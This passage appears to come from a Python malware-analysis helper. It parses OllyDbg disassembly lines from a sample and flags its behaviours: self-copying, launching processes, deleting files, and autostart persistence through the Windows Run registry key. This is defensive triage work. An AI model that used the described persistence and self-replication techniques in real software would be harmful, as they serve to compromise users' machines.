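    0040F904 |. E8 834EFFFF call <jmp.&kernel32.SetFileAttributes>; \\SetFileAttributesA
and reports which imported APIs and quoted string constants the code touches.
"""
import re
from collections import Counter
from typing import Dict, List, Optional

ADDR_RE = re.compile(r'^([0-9A-F]{8})\s+(.*)$')
# Opcode bytes are uppercase hex and the flow column is punctuation, so the first
# lowercase word after the address is the mnemonic.
MNEMONIC_RE = re.compile(r'([a-z][a-z0-9]*)\s*(.*)$')
IMPORT_RE = re.compile(r'<jmp\.&(\w+)\.(\w+)>')   # thunk to an imported API
API_NAME_RE = re.compile(r'^\\(\w+)')             # OllyDbg puts the resolved name after '\'
QUOTED_RE = re.compile(r'"([^"]*)"')              # ASCII "..." and Class = "..." comments

# Constructed sample: lines copied from the listing above.
SAMPLE = r"""
0040F904 |. E8 834EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F97F |. E8 404DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F9F5 |. E8 824DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040FB66 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB6B |. B8 02000080 mov eax, 80000002
0040FBE8 |. E8 974AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FC6F |. E8 304BFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FD29 |.^ 75 91 \jnz short 0040FCBC
0040FD57 |. E8 C049FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FDD5 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
0040FE3B |. E8 2449FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040FE99 |. E8 FE47FFFF call 0040469C ; \1.0040469C
0040FF2A |. E8 8D47FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF55 |. E8 C248FFFF call <jmp.&user32.SetTimer> ; \SetTimer
"""

# Behaviour labels (my own wording) for the APIs seen in the dump.
BEHAVIOURS = {
    "CopyFileA": "copies a file (after GetModuleFileNameA: self-replication)",
    "WinExec": "launches a process",
    "SetFileAttributesA": "changes file attributes",
    "DeleteFileA": "deletes files",
    "RemoveDirectoryA": "removes directories",
    "OpenMutexA": "checks a named mutex (single-instance guard)",
    "CreateThread": "starts worker threads",
    "SetTimer": "installs timer callbacks",
}
STRING_HINTS = {
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run": "autostart persistence via Run key",
    "Shell_TrayWnd": "looks for Explorer's taskbar window (desktop/session check)",
}
HIVES = {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"}


def parse_line(line: str) -> Optional[Dict]:
    """Split one listing line into address, mnemonic, operands, comment, API and strings."""
    m = ADDR_RE.match(line.strip())
    if not m:
        return None
    addr, rest = m.group(1), m.group(2)
    # Caveat: a ';' inside a quoted string would be cut here; none occur in this listing.
    text, _, comment = rest.partition(';')
    mm = MNEMONIC_RE.search(text)
    if not mm:
        return None
    rec = {"addr": addr, "mnemonic": mm.group(1), "operands": mm.group(2).strip(),
           "comment": comment.strip(), "dll": None, "api": None}
    im = IMPORT_RE.search(rec["operands"])
    if im:  # prefer the A/W-suffixed name OllyDbg resolved in the comment
        resolved = API_NAME_RE.match(rec["comment"])
        rec["dll"] = im.group(1)
        rec["api"] = resolved.group(1) if resolved else im.group(2)
    rec["strings"] = QUOTED_RE.findall(rec["comment"])
    return rec


def summarize(listing: str) -> Dict[str, object]:
    """Count imported APIs, collect string constants and derive behaviour findings."""
    recs = [r for r in (parse_line(l) for l in listing.splitlines()) if r]
    apis = Counter(r["api"] for r in recs if r["api"])
    strings: List[str] = [s for r in recs for s in r["strings"]]
    findings = sorted({BEHAVIOURS[a] for a in apis if a in BEHAVIOURS}
                      | {STRING_HINTS[s] for s in strings if s in STRING_HINTS})
    for r in recs:  # an HKEY constant loaded right before a registry path is the hive
        if r["mnemonic"] == "mov" and r["operands"][-8:] in HIVES:
            findings.append("registry hive " + HIVES[r["operands"][-8:]])
    return {"api_counts": dict(apis), "strings": strings, "findings": findings}


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(key, "=", value)
```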